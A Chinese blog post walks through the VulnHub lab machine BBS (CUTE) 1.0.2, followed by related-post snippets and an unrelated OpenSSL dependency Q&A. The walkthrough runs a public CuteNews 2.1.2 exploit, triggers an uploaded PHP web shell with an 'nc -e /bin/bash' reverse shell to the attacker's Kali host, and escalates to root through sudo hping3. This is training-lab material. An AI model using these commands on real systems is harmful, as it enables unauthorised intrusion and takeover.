BBS (CUTE): 1.0.2

原创 已于 2024-06-15 18:44:31 修改 · 421 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2024-06-15 17:50:36 首次发布

BBS (CUTE): 1.0.2  https://www.vulnhub.com/entry/bbs-cute-102,567/
靶场配置网络
登陆时按e 修改rw signie init=/bin/bash 按Ctrl+x 进入 root@(none) 模式
ip add 看到网卡名字叫做ens33
需要修改网卡配置文件
vi /etc/network/interfaces
allow-hotplug ens33
iface ens33 1inet dhcp
重启获得IP地址

使用目录扫描,获得
http://192.168.204.134/index.php
留意到版本号CuteNews 2.1.2 

在kali上操作
searchsploit cutenews 2.1.2  看到路径
cp /usr/share/exploitdb/exploits/php/webapps/48800.py ./
修改py配置文件,将所有的/CuteNews删除
执行命令python3 48800.py
输入http://192.168.204.134获得账号名密码

登录BBS (CUTE): 1.0.2,找到注入点
http://192.168.204.134/uploads/avatar_vDnS6Pt85h_vDnS6Pt85h.php?cmd=nc%20-e%20/bin/bash%20192.168.204.135%201234

在kali上连接 nc -lvvp 1234 (从KALI输入访问靶机)
python -c 'import pty;pty.spawn("/bin/bash")'
-c : 执行具体的代码
import :导入语句
pty : 终端(接口)
pty.spawn : 执行命令

export TERM=screen

stty rows 45 columns 194 (参考stty -a)
reset

通过sudo -l 查看权限
/usr/sbin/hping3 获得root权限
find / -name /root/root.txt

samtaoys
关注
VulnHub靶场之BBS (cute): 1.0.1
A_dmin的博客
10-04 1089
VulnHub靶场之BBS (cute): 1.0.1 扫描IP以及端口: 先不管其他东西,直接访问80,web页面: 目录扫描: 访问index.php: 发现使用的是CuteNews 2.1.2,搜索一下相关漏洞,三个利用方式: 看了一下,第一个要手动加载啥的,也就是说msf中没有加载的,,,, 第三个是文件上传,但是验证码好像有问题,没尝试,,直接使用大佬的exploit了,,, 运行得到简单shell: 开启python简单http服务: 上传shell.php文件: 运行shell
vulnhub-BBS (CUTE): 1.0.1-cute
yutianovo的博客
09-25 705
http://blog.yutian233.xyz/index.php/archives/63/ 靶机描述 Machine name: BBS (Bulletin Board System) Level: Easy->Intermediate flags: user, root Description: really technical machine, if you are ready for certifications it will be a good tool to test your
实战打靶集锦-011-bbs-cute
阿尔泰野狼的博客
03-18 599
本文记录了博主的一次失败的打靶经历
vulnhub-BBS(cute)1.0.1
qq_41810304的博客
09-26 588
前言: 很长时间没有做过靶机了,现在又跑回来做一做。确切的说本人就是菜鸡本菜了,因为困难靶机做不了,中等靶机有难度,简单靶机又嫌弃,想来多少有些可笑,总想去提升,却总感觉在原地踏步。看了一些推荐,我又跑去xctf攻防世界注册了个账号刷刷ctf题,确实发现了很多知识盲区,也知道有很多东西要学,却又不知道如何学起。书中的来终觉浅,又缺乏实践,现在我呀,就像一个无头的苍蝇到处瞎撞。 好了,言归正传,这次靶机名称见题目,下载链接就不放了。文中内容仅供学习。 kali:192.16...
OSCP靶场系列-Esay-BBSCute保姆级
杳若的博客
07-23 6310
BBSCute保姆级靶场流程
Vulnhub:BBS (CUTE): 1.0.2
分享
04-09 353
Vulnhub:BBS (CUTE): 1.0.2。。。简单的RCE、SUID提权!
it.sauronsoftware:jave:1.0.2
04-08
《IT技术解析:深入理解it.sauronsoftware:jave:1.0.2》 在IT领域,我们经常需要处理各种软件包,其中"it.sauronsoftware:jave:1.0.2"是一个特定的Java软件包,它在开发者社区中具有一定的知名度。这个包的名称遵循...
视频解析工具:jave-1.0.2.jar.zip
08-14
"视频解析工具:jave-1.0.2.jar.zip" 是一款专门针对音视频处理的软件资源,它能帮助用户解决一系列与音视频格式转换、参数解析、时间长度计算以及文件大小管理相关的问题。 Jave是一款Java编写的开源音视频处理库...
activation-1.0.2.jar
03-01
官方版本,亲测可用
jave-1.0.2
02-21
在实际应用中,开发者可以通过以下步骤使用Jave-1.0.21. 下载并解压缩提供的"jave-1.0.2"文件,得到.jar包。 2..jar包添加到项目的类路径中,这可以通过IDE的设置或构建脚本来完成。 3. 引入Jave的相关类和...
hibernate-jpa-2.1-api-1.0.2.Final-API文档-中英对照版.zip
06-12
赠送jar包:hibernate-jpa-2.1-api-1.0.2.Final.jar; 赠送原API文档:hibernate-jpa-2.1-api-1.0.2.Final-javadoc.jar; 赠送源代码:hibernate-jpa-2.1-api-1.0.2.Final-sources.jar; 赠送Maven依赖信息文件:...
OSCP BBSCute 详细教学
m0_52545432的博客
05-08 365
BBSCute靶机
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8753
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就1013日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于Python实现的信息检索与文本挖掘综合搜索引擎系统-包含网络爬虫模块-网页内容解析与分词处理-索引构建与数据库存储-Web查询服务与结果展示-用于课程大作业与学术研究-技术栈.zip
08-22
jdk1.8基于Python实现的信息检索与文本挖掘综合搜索引擎系统_包含网络爬虫模块_网页内容解析与分词处理_索引构建与数据库存储_Web查询服务与结果展示_用于课程大作业与学术研究_技术栈.zip
一个基于python的文件同步小工具.zip
08-22
一个基于python的文件同步小工具.zip
python3-wxpython4-webview-4.0.7-13.el8.tar.gz
最新发布
08-22
# 适用操作系统:Centos8 #Step1、解压 tar -zxvf xxx.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
基于python的多功能扫描器.zip
08-22
基于python的多功能扫描器.zip
基于python的第三方QQ登陆工具类.zip
08-22
基于python的第三方QQ登陆工具类.zip
中国地形图三
08-22
indexssy.html
error: Failed dependencies: crypto-policies is needed by compat-openssl10-1:1.0.2o-3.el8.x86_64 openssl < 1:1.1.0 conflicts with compat-openssl10-1:1.0.2o-3.el8.x86_64 openssl-libs < 1:1.1.0 conflicts with compat-openssl10-1:1.0.2o-3.el8.x86_64
03-11
<think>好的,我现在需要解决用户在安装compat-openssl10时遇到的crypto-policies和openssl版本冲突的问题。首先,我得理解这个问题的情况。用户可能在基于RHEL或CentOS的系统上安装旧版的OpenSSL兼容包,但遇到了依赖冲突,尤其是与crypto-policies相关的包冲突。 首先,我应该回忆一下RHEL/CentOS中crypto-policies的作用。这个包是用于系统范围的加密策略管理,确保所有服务使用符合标准的加密算法和协议。当安装旧版的OpenSSL时,可能会因为加密策略不兼容而导致冲突,因为新版的crypto-policies可能不再支持旧版OpenSSL使用的某些算法或配置。 接下来,用户尝试安装compat-openssl10,这通常是为了满足某些旧应用程序的依赖需求。但系统当前安装的openssl版本可能较高,如3.x,而crypto-policies可能要求最低的openssl版本高于1.0,导致无法同时满足。 可能的解决方案包括: 1. **检查现有软件包版本**:确认当前系统中openssl和crypto-policies的具体版本,以及compat-openssl10的需求。可能需要使用yum或dnf的查询命令,比如`rpm -q openssl crypto-policies`。 2. **使用版本降级或替代仓库**:如果官方仓库中的crypto-policies版本过高,可能需要启用额外的仓库(如EPEL)来寻找兼容的版本组合。或者,尝试安装较低版本的crypto-policies,但需注意系统兼容性。 3. **临时禁用crypto-policies**:在某些情况下,可以暂时调整系统的加密策略,设置为较旧的模式(如LEGACY),但这样可能会降低系统安全性,需谨慎操作,并在安装后恢复。 4. **使用容器或虚拟环境**:如果冲突无法解决,建议用户考虑使用Docker容器或虚拟环境来隔离旧版OpenSSL的环境,避免影响宿主系统的安全性。 5. **手动编译旧版OpenSSL**:如果包管理器无法解决依赖问题,用户可能需要手动下载并编译旧版OpenSSL,并安装到非系统目录,然后通过环境变量(如LD_LIBRARY_PATH)指定库路径,供应用程序使用。需要注意的是,手动编译可能需要处理依赖和配置问题,如引用[2]中提到的符号链接问题,以及引用[3]中涉及的内存泄漏检查方法。 6. **依赖解决工具**:利用yum或dnf的解决依赖功能,比如`dnf install --allowerasing`来允许替换冲突的包,但需注意这可能导致其他依赖问题,操作前应做好备份。 此外,还需要考虑系统安全性和维护性。强制降级或替换系统核心加密组件可能带来安全风险,因此需要评估是否有必要使用旧版OpenSSL,或者是否有其他方法替代。 可能用户遇到的问题具体是,安装compat-openssl10时,系统提示crypto-policies需要某个版本的openssl,而compat-openssl10需要另一个版本,导致无法同时满足。这时候需要查看错误信息的具体内容,确定冲突的包版本,然后寻找是否有兼容的版本组合,或者调整系统策略。 例如,引用[1]中提到的安装openssl-1.1.1的步骤,用户可能需要手动编译特定版本,但如果是安装兼容包,可能需要调整依赖关系。另外,引用[2]中的解决方法涉及创建符号链接,可能在某些情况下帮助解决路径问题,但需注意是否适用于当前系统配置。 总结下来,可能的解决步骤是: 1. 确认冲突的具体版本和包。 2. 尝试使用--skip-broken或--allowerasing选项安装。 3. 调整加密策略到LEGACY模式,安装后恢复。 4. 考虑手动编译或使用容器隔离环境。 同时,需要提醒用户在操作前备份重要数据,并谨慎处理系统级软件包,避免系统不稳定。</think>### 解决安装compat-openssl10时crypto-policies与openssl版本冲突的步骤 #### 1. **确认冲突详情** 首先查看具体的错误信息,明确冲突的软件包版本: ```bash yum install compat-openssl10 ``` 或使用`dnf`: ```bash dnf install compat-openssl10 ``` 错误信息可能类似: ``` Error: Package crypto-policies-XXXX requires openssl >= Y.Y.Y, but compat-openssl10 provides openssl = Z.Z.Z ``` #### 2. **尝试绕过依赖冲突** 使用`--allowerasing`或`--skip-broken`选项强制安装,但需谨慎操作(可能破坏依赖): ```bash dnf install compat-openssl10 --allowerasing ``` 或 ```bash yum install compat-openssl10 --skip-broken ``` #### 3. **调整系统加密策略** 临时降低加密策略级别以兼容旧版OpenSSL: ```bash update-crypto-policies --set LEGACY ``` 安装完成后恢复默认策略(避免安全隐患): ```bash update-crypto-policies --set DEFAULT ``` #### 4. **手动编译旧版OpenSSL** 若包管理器无法解决冲突,可手动编译并安装到独立目录(以OpenSSL 1.0.2为例): ```bash wget https://www.openssl.org/source/old/1.0.2/openssl-1.0.2e.tar.gz tar -zxvf openssl-1.0.2e.tar.gz cd openssl-1.0.2e ./config --prefix=/opt/openssl-legacy make && sudo make install ``` 配置应用程序使用自定义路径: ```bash export LD_LIBRARY_PATH=/opt/openssl-legacy/lib:$LD_LIBRARY_PATH ``` #### 5. **使用容器隔离环境** 通过Docker容器运行依赖旧版OpenSSL的应用: ```dockerfile FROM centos:7 RUN yum install -y compat-openssl10 # 其他应用安装步骤 ``` 构建并运行容器以避免宿主系统冲突。 #### 6. **检查依赖兼容性** 若系统必须保留高版本OpenSSL,可尝试查找兼容的`compat-openssl10`变种包,例如: ```bash dnf search compat-openssl ``` 或启用EPEL仓库: ```bash dnf install epel-release ``` --- ### 注意事项 - **安全性**:降低加密策略或使用旧版OpenSSL可能引入安全风险,建议仅在隔离环境中使用[^1][^2]。 - **依赖影响**:强制安装可能影响其他软件,操作前建议备份系统或使用虚拟机测试。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值